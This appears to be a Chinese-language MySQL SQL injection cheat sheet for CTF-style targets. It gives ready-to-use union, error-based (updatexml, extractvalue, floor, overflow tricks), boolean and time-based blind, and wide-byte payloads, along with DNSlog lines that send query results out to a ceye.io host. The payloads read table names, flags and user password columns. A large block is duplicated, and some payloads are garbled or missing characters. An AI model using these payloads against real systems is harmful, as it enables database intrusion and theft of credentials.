CREATE DATABASE test; //创建名为test的数据库
DROP DATABASE test; //删除名为test的数据库
CREATE table `admin`(`user` varchar(255) NULL,`pass` varchar(255) NULL); //创建admin表
alter table test drop id; //删除test表中的id字段
alter table test add column id int default 0 first; //在test表中添加id字段
alter table test modify id int auto_increment primary key; //修改test表中id字段为自增主键
alter table test rename to date; //将test表修改为data表
Show databases; //查询所有数据库
数据层面的增删改查
insert into student(name,sex,year)values("张三","男";"1990/6/15");
delete from student where name='张三';
Update student set sex='女' where name='张三';
Select * from student;
id=-1 union select 1,(select schema_name from information_schema.schemata limit 0,1),3
id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3 //如果只有一张表,需要去掉limit,否则会报错
id=-1 union select 1,(select column_name from information_schema.columns where table_name='flag' limit 0,1),3
id=-1 union select 1,(select flag from flag limit 0,1),3
id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4
id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4
id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3,4
id=-1 union select 1,(select group_concat(flag) from flag),3,4
报错注入
基于updatexml
'and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)--+
'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= database()),0x7e),1)--+
'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema= database() and table_name='users'),0x7e),1)--+
'and updatexml(1,concat(0x7e,(select group_concat(flag) from flag.flag),0x7e),1)--+
'and updatexml(1,concat(0x7e,substring((select group_concat(flag) from flag.flag),32),0x7e),1)--+ //报错注入只能显示出32个字符,使用substring(*,32)可以从第32位数据开始读取(0x7e占了 一位),当读取大量数据时应为32,63,95
基于extractvalue
'and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))--+
'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= database()),0x7e))--+
'and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema= database() and table_name='users'),0x7e))--+
'and extractvalue(1,concat(0x7e,(select group_concat(flag) from flag.flag),0x7e))--+
'and updatexml(1,concat(0x7e,substring((select group_concat(flag) from flag.flag),32),0x7e),1)--+ //报错注入只能显示出32个字符,使用substring(*,32)可以从第32位数据开始读取(0x7e占了 一位),当读取大量数据时应为32,63,95
以下内容来源于互联网,大多数函数的利用都有版本条件或其他条件限制 1.floor() floor 和group by 搭配使用 利用group by 的key唯一性 和mysql 编码执行顺序导致二次执行产生不同key select from users where id=1 OR+1e0GROUP BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)2)) HAVING+MIN(0)OR+1 数值型注入时 不用闭合‘ 进行注入 利用 or 条件注入 通用型 的一般格式 注入 select from users where id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) 2.extractvalue 对XML文档进行查询的函数 和updatexml() 一样 针对5.5版本以后 select * from users where id=1 and extractvalue(1,concat(0x7e,user())) 3.updatexml() select * from test where id=1 and updatexml(1,concat(0x7e,user()),1) 4.geometrycollection() select from test where id=1 and geometrycollection((select from(select * from(select user())a)b)); 5.multipoint() select from test where id=1 and multipoint((select from(select * from(select user())a)b)); 6.polygon() select from test where id=1 and polygon((select from(select * from(select user())a)b)); 7.multipolygon() select from test where id=1 and multipolygon((select from(select * from(select user())a)b)); 8.linestring() select from test where id=1 and multilinestring((select from(select * from(select user())a)b)); 9.multilinestring() select from test where id=1 and multilinestring((select from(select * from(select user())a)b)); 10.exp() exp()即为以e为底的对数函数 exp(709) 里面的参数在大于709时函数会报错 ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)' select from test where id=1 and exp(~(select from(select user())a)); 11.procedure analyse select * from users order by 1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1) 12.用户变量 select min(@a:=1) from information_schema.tables group by concat(database() ,@a:=(@a+1)%2) 13.通过NAME_CONST(适用于低版本) +or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x) 14.0位取反报错 (BIGINT溢出) select ~0+!(select*from(select user())x); 15.atan,ceil,floor,!,...相减溢出 select !atan((select*from(select user())a))-~0; select !ceil((select*from(select user())a))-~0; select !floor((select*from(select user())a))-~0; select !HEX((select*from(select user())a))-~0; select !RAND((select*from(select user())a))-~0; select !FLOOR((select*from(select user())a))-~0; select !CEILING((select*from(select user())a))-~0; select !RAND((select*from(select user())a))-~0; select !TAN((select*from(select user())a))-~0; select !SQRT((select*from(select user())a))-~0; select !ROUND((select*from(select user())a))-~0; select !SIGN((select*from(select user())a))-~0; 16.@:= !(selectfrom(select(concat(@:=0,(select count()frominformation_schema.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0 (select(!x-~0)from(select(concat (@:=0,(select count(*)frominformation_schema.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a) (select!x-~0.from(select(concat (@:=0,(select count(*)frominformation_schema.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a) 17.^ 按位异或 select !(select*from(select user())a)-0^222; 18.0位表减溢出 (select(!x-~0)from(select(select user())x)a) (select!x-~0.from(select(select user())x)a) 19.in溢出 select from users where id in(~0+!(selectfrom(select user())x))
1'and length(database())=1#
1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>1#
1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>1#
时间盲注
在基于布尔盲注的基础上加了if sleep判断
'and if(length(database())=5,sleep(3),1)--+
'and if(ascii(substr((select password from users limit 0,1),1,1))>100,sleep(3),1)--+
'and if(ascii(substr((select group_concat(password) from users),1,1))>100,sleep(3),1)--+
id=-1%df' union select 1,database(),3,4--+
id=-1%df' union select 1,(select table_name from information_schema.tables where table_schema=(select database())limit 0,1),3,4--+
id=-1%df' union select 1,(select column_name from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 0,1) limit 0,1),3,4--+
id=-1%df' union select 1,(select flag from flag.flag limit 0,1),3,4--+
and (select load_file(concat('//',(select database()),'.4xxx5.ceye.io/sqli')))
and (select load_file(concat('//',(select group_concat(flag) from flag.flag),'.4xxx.ceye.io/sqli')))
mysql基础
数据库层面的增删改查
数据层面的增删改查
mysql内置函数
mysql注释符
联合注入
使用limit单个查询
往后所有的注入,都可以在limit与group_concat中灵活切换
使用group_concat()分组查询
报错注入
基于updatexml
基于extractvalue
以下内容来源于互联网,大多数函数的利用都有版本条件或其他条件限制
1.floor()
floor 和group by 搭配使用 利用group by 的key唯一性 和mysql 编码执行顺序导致二次执行产生不同key
select from users where id=1 OR+1e0GROUP BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)2)) HAVING+MIN(0)OR+1
数值型注入时 不用闭合‘ 进行注入 利用 or 条件注入
通用型 的一般格式 注入
select from users where id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
2.extractvalue
对XML文档进行查询的函数 和updatexml() 一样 针对5.5版本以后
select * from users where id=1 and extractvalue(1,concat(0x7e,user()))
3.updatexml()
select * from test where id=1 and updatexml(1,concat(0x7e,user()),1)
4.geometrycollection()
select from test where id=1 and geometrycollection((select from(select * from(select user())a)b));
5.multipoint()
select from test where id=1 and multipoint((select from(select * from(select user())a)b));
6.polygon()
select from test where id=1 and polygon((select from(select * from(select user())a)b));
7.multipolygon()
select from test where id=1 and multipolygon((select from(select * from(select user())a)b));
8.linestring()
select from test where id=1 and multilinestring((select from(select * from(select user())a)b));
9.multilinestring()
select from test where id=1 and multilinestring((select from(select * from(select user())a)b));
10.exp()
exp()即为以e为底的对数函数
exp(709) 里面的参数在大于709时函数会报错
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
select from test where id=1 and exp(~(select from(select user())a));
11.procedure analyse
select * from users order by 1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
12.用户变量
select min(@a:=1) from information_schema.tables group by concat(database()
,@a:=(@a+1)%2)
13.通过NAME_CONST(适用于低版本)
+or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
14.0位取反报错 (BIGINT溢出)
select ~0+!(select*from(select user())x);
15.atan,ceil,floor,!,...相减溢出
select !atan((select*from(select user())a))-~0;
select !ceil((select*from(select user())a))-~0;
select !floor((select*from(select user())a))-~0;
select !HEX((select*from(select user())a))-~0;
select !RAND((select*from(select user())a))-~0;
select !FLOOR((select*from(select user())a))-~0;
select !CEILING((select*from(select user())a))-~0;
select !RAND((select*from(select user())a))-~0;
select !TAN((select*from(select user())a))-~0;
select !SQRT((select*from(select user())a))-~0;
select !ROUND((select*from(select user())a))-~0;
select !SIGN((select*from(select user())a))-~0;
16.@:=
!(selectfrom(select(concat(@:=0,(select count()from
information_schema.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0(select(!x-~0)from(select(concat (@:=0,(select count(*)from
information_schema.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)(select!x-~0.from(select(concat (@:=0,(select count(*)from
information_schema.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)17.^ 按位异或
select !(select*from(select user())a)-0^222;
18.0位表减溢出
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
19.in溢出
select from users where id in(~0+!(selectfrom(select user())x))
布尔盲注
相比较于联合注入,只不过多了一个截取字符串取ASCII值作比较的过程,原理还是一样的,这里只给出一个demo
时间盲注
在基于布尔盲注的基础上加了if sleep判断
宽字节注入
由于我们输入的单引号被转义,所以id无法逃逸。一般情况下此处无法注入,但有一个特例,在数据库是GBK编码时,可以利用宽字节注入。宽字节的格式是在地址栏后先加一个%df,再加单引号,因为反斜杠 的编码为%5c,在GBK编码中,%df%5c是繁体汉字“连”,所以这个时候单引号可以成功逃逸。
其流程和联合注入一样,但是这里不能使用引号,所以要套娃
DNSlog注入
执行SQL语句,只不过把执行了SQL语句之后返回的结果通过另一种形式反馈给了我们——dnslog
前提:只有在secure_file_priv不为off/null的情况下才能实现
堆叠注入
前提:允许执行多条语句,如采用mysqli_multi_query()等方法
原理:可以执行多条语句,多语句间用分号隔开
杂七杂八的注入